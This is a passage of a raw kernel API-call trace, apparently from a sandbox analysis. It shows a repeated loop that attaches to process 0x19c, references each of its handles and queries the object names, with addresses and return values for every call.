[0264.827] PsReleaseProcessExitSynchronization () returned 0x2 [0264.827] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809e [0264.827] ObQueryNameString (in: Object=0xffffc00149712270, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.827] ObfDereferenceObject (Object=0xffffc00149712270) returned 0x8000 [0264.827] IoCompleteRequest () returned 0x0 [0264.827] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.827] PsAcquireProcessExitSynchronization () returned 0x0 [0264.827] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.827] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148af3280, HandleInformation=0x0) returned 0x0 [0264.827] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.827] PsReleaseProcessExitSynchronization () returned 0x2 [0264.827] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809d [0264.827] ObQueryNameString (in: Object=0xffffc00148af3280, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.827] ObfDereferenceObject (Object=0xffffc00148af3280) returned 0x8000 [0264.827] IoCompleteRequest () returned 0x0 [0264.827] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.827] PsAcquireProcessExitSynchronization () returned 0x0 [0264.827] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.827] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148590810, HandleInformation=0x0) returned 0x0 [0264.827] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.827] PsReleaseProcessExitSynchronization () returned 0x2 [0264.827] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809c [0264.827] ObQueryNameString (in: Object=0xffffc00148590810, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.827] ObfDereferenceObject (Object=0xffffc00148590810) returned 0x8000 [0264.827] IoCompleteRequest () returned 0x0 [0264.827] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.827] PsAcquireProcessExitSynchronization () returned 0x0 [0264.827] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.827] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001497de220, HandleInformation=0x0) returned 0x0 [0264.827] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.827] PsReleaseProcessExitSynchronization () returned 0x2 [0264.827] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809b [0264.827] ObQueryNameString (in: Object=0xffffc001497de220, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.827] ObfDereferenceObject (Object=0xffffc001497de220) returned 0x8000 [0264.827] IoCompleteRequest () returned 0x0 [0264.827] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.827] PsAcquireProcessExitSynchronization () returned 0x0 [0264.827] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.827] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148973e90, HandleInformation=0x0) returned 0x0 [0264.827] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.827] PsReleaseProcessExitSynchronization () returned 0x2 [0264.827] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809a [0264.827] ObQueryNameString (in: Object=0xffffc00148973e90, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.828] ObfDereferenceObject (Object=0xffffc00148973e90) returned 0x8000 [0264.828] IoCompleteRequest () returned 0x0 [0264.828] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.828] PsAcquireProcessExitSynchronization () returned 0x0 [0264.828] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.828] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001498012b0, HandleInformation=0x0) returned 0x0 [0264.828] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.828] PsReleaseProcessExitSynchronization () returned 0x2 [0264.828] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28099 [0264.828] ObQueryNameString (in: Object=0xffffc001498012b0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.828] ObfDereferenceObject (Object=0xffffc001498012b0) returned 0x8000 [0264.828] IoCompleteRequest () returned 0x0 [0264.828] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.828] PsAcquireProcessExitSynchronization () returned 0x0 [0264.828] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.828] ObReferenceObjectByHandle (in: Handle=0x304, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001497b86b0, HandleInformation=0x0) returned 0x0 [0264.828] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.828] PsReleaseProcessExitSynchronization () returned 0x2 [0264.828] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28098 [0264.828] ObQueryNameString (in: Object=0xffffc001497b86b0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.828] ObfDereferenceObject (Object=0xffffc001497b86b0) returned 0x8000 [0264.828] IoCompleteRequest () returned 0x0 [0264.828] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.828] PsAcquireProcessExitSynchronization () returned 0x0 [0264.828] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.828] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001494d55a0, HandleInformation=0x0) returned 0x0 [0264.828] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.828] PsReleaseProcessExitSynchronization () returned 0x2 [0264.828] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28097 [0264.828] ObQueryNameString (in: Object=0xffffc001494d55a0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.828] ObfDereferenceObject (Object=0xffffc001494d55a0) returned 0x8000 [0264.828] IoCompleteRequest () returned 0x0 [0264.828] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.828] PsAcquireProcessExitSynchronization () returned 0x0 [0264.828] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.828] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149308730, HandleInformation=0x0) returned 0x0 [0264.828] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.828] PsReleaseProcessExitSynchronization () returned 0x2 [0264.828] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28096 [0264.828] ObQueryNameString (in: Object=0xffffc00149308730, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.828] ObfDereferenceObject (Object=0xffffc00149308730) returned 0x8000 [0264.828] IoCompleteRequest () returned 0x0 [0264.828] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.828] PsAcquireProcessExitSynchronization () returned 0x0 [0264.829] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.829] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001493f6060, HandleInformation=0x0) returned 0x0 [0264.829] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.829] PsReleaseProcessExitSynchronization () returned 0x2 [0264.829] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28095 [0264.829] ObQueryNameString (in: Object=0xffffc001493f6060, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.829] ObfDereferenceObject (Object=0xffffc001493f6060) returned 0x8000 [0264.829] IoCompleteRequest () returned 0x0 [0264.829] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.829] PsAcquireProcessExitSynchronization () returned 0x0 [0264.829] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.829] ObReferenceObjectByHandle (in: Handle=0x328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149889540, HandleInformation=0x0) returned 0x0 [0264.829] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.829] PsReleaseProcessExitSynchronization () returned 0x2 [0264.829] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28094 [0264.829] ObQueryNameString (in: Object=0xffffc00149889540, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.829] ObfDereferenceObject (Object=0xffffc00149889540) returned 0x7fcf [0264.829] IoCompleteRequest () returned 0x0 [0264.829] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.829] PsAcquireProcessExitSynchronization () returned 0x0 [0264.829] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.829] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149834220, HandleInformation=0x0) returned 0x0 [0264.829] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.829] PsReleaseProcessExitSynchronization () returned 0x2 [0264.829] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28093 [0264.829] ObQueryNameString (in: Object=0xffffc00149834220, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.829] ObfDereferenceObject (Object=0xffffc00149834220) returned 0x8000 [0264.829] IoCompleteRequest () returned 0x0 [0264.829] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.829] PsAcquireProcessExitSynchronization () returned 0x0 [0264.829] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.829] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a495950, HandleInformation=0x0) returned 0x0 [0264.829] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.829] PsReleaseProcessExitSynchronization () returned 0x2 [0264.829] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28092 [0264.829] ObQueryNameString (in: Object=0xffffc0014a495950, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.829] ObfDereferenceObject (Object=0xffffc0014a495950) returned 0x8000 [0264.829] IoCompleteRequest () returned 0x0 [0264.829] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.829] PsAcquireProcessExitSynchronization () returned 0x0 [0264.829] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.829] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149889cc0, HandleInformation=0x0) returned 0x0 [0264.829] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.829] PsReleaseProcessExitSynchronization () returned 0x2 [0264.829] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28091 [0264.830] ObQueryNameString (in: Object=0xffffc00149889cc0, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.830] ObfDereferenceObject (Object=0xffffc00149889cc0) returned 0x8000 [0264.830] IoCompleteRequest () returned 0x0 [0264.830] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.830] PsAcquireProcessExitSynchronization () returned 0x0 [0264.830] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.830] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149854bf0, HandleInformation=0x0) returned 0x0 [0264.830] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.830] PsReleaseProcessExitSynchronization () returned 0x2 [0264.830] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28090 [0264.830] ObQueryNameString (in: Object=0xffffc00149854bf0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.830] ObfDereferenceObject (Object=0xffffc00149854bf0) returned 0x8000 [0264.830] IoCompleteRequest () returned 0x0 [0264.830] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.830] PsAcquireProcessExitSynchronization () returned 0x0 [0264.830] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.830] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149bb1810, HandleInformation=0x0) returned 0x0 [0264.830] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.830] PsReleaseProcessExitSynchronization () returned 0x2 [0264.830] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808f [0264.830] ObQueryNameString (in: Object=0xffffc00149bb1810, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.830] ObfDereferenceObject (Object=0xffffc00149bb1810) returned 0x8000 [0264.830] IoCompleteRequest () returned 0x0 [0264.830] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.830] PsAcquireProcessExitSynchronization () returned 0x0 [0264.830] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.830] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a21c780, HandleInformation=0x0) returned 0x0 [0264.830] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.830] PsReleaseProcessExitSynchronization () returned 0x2 [0264.830] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808e [0264.830] ObQueryNameString (in: Object=0xffffc0014a21c780, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.830] ObfDereferenceObject (Object=0xffffc0014a21c780) returned 0x8000 [0264.830] IoCompleteRequest () returned 0x0 [0264.830] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.830] PsAcquireProcessExitSynchronization () returned 0x0 [0264.830] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.830] ObReferenceObjectByHandle (in: Handle=0x380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149e1a740, HandleInformation=0x0) returned 0x0 [0264.830] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.830] PsReleaseProcessExitSynchronization () returned 0x2 [0264.830] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808d [0264.830] ObQueryNameString (in: Object=0xffffc00149e1a740, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.830] ObfDereferenceObject (Object=0xffffc00149e1a740) returned 0x8000 [0264.830] IoCompleteRequest () returned 0x0 [0264.831] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.831] PsAcquireProcessExitSynchronization () returned 0x0 [0264.831] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.831] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149dbffc0, HandleInformation=0x0) returned 0x0 [0264.831] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.831] PsReleaseProcessExitSynchronization () returned 0x2 [0264.831] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808c [0264.831] ObQueryNameString (in: Object=0xffffc00149dbffc0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.831] ObfDereferenceObject (Object=0xffffc00149dbffc0) returned 0x8000 [0264.831] IoCompleteRequest () returned 0x0 [0264.831] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.831] PsAcquireProcessExitSynchronization () returned 0x0 [0264.831] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.831] ObReferenceObjectByHandle (in: Handle=0x398, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149dffd50, HandleInformation=0x0) returned 0x0 [0264.831] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.831] PsReleaseProcessExitSynchronization () returned 0x2 [0264.831] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808b [0264.831] ObQueryNameString (in: Object=0xffffc00149dffd50, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.831] ObfDereferenceObject (Object=0xffffc00149dffd50) returned 0x8000 [0264.831] IoCompleteRequest () returned 0x0 [0264.831] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.831] PsAcquireProcessExitSynchronization () returned 0x0 [0264.831] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.831] ObReferenceObjectByHandle (in: Handle=0x39c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a3e3910, HandleInformation=0x0) returned 0x0 [0264.831] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.831] PsReleaseProcessExitSynchronization () returned 0x2 [0264.831] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2808a [0264.831] ObQueryNameString (in: Object=0xffffc0014a3e3910, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.831] ObfDereferenceObject (Object=0xffffc0014a3e3910) returned 0x8000 [0264.831] IoCompleteRequest () returned 0x0 [0264.831] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.831] PsAcquireProcessExitSynchronization () returned 0x0 [0264.831] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.831] ObReferenceObjectByHandle (in: Handle=0x3a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a23a750, HandleInformation=0x0) returned 0x0 [0264.831] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.831] PsReleaseProcessExitSynchronization () returned 0x2 [0264.831] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28089 [0264.831] ObQueryNameString (in: Object=0xffffc0014a23a750, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.831] ObfDereferenceObject (Object=0xffffc0014a23a750) returned 0x8000 [0264.831] IoCompleteRequest () returned 0x0 [0264.831] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.831] PsAcquireProcessExitSynchronization () returned 0x0 [0264.831] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.831] ObReferenceObjectByHandle (in: Handle=0x3bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001488f2780, HandleInformation=0x0) returned 0x0 [0264.831] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.832] PsReleaseProcessExitSynchronization () returned 0x2 [0264.832] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28088 [0264.832] ObQueryNameString (in: Object=0xffffc001488f2780, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.832] ObfDereferenceObject (Object=0xffffc001488f2780) returned 0x8000 [0264.832] IoCompleteRequest () returned 0x0 [0264.832] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.832] PsAcquireProcessExitSynchronization () returned 0x0 [0264.832] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.832] ObReferenceObjectByHandle (in: Handle=0x3cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a26bfc0, HandleInformation=0x0) returned 0x0 [0264.832] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.832] PsReleaseProcessExitSynchronization () returned 0x2 [0264.832] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28087 [0264.832] ObQueryNameString (in: Object=0xffffc0014a26bfc0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.832] ObfDereferenceObject (Object=0xffffc0014a26bfc0) returned 0x8000 [0264.832] IoCompleteRequest () returned 0x0 [0264.832] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: 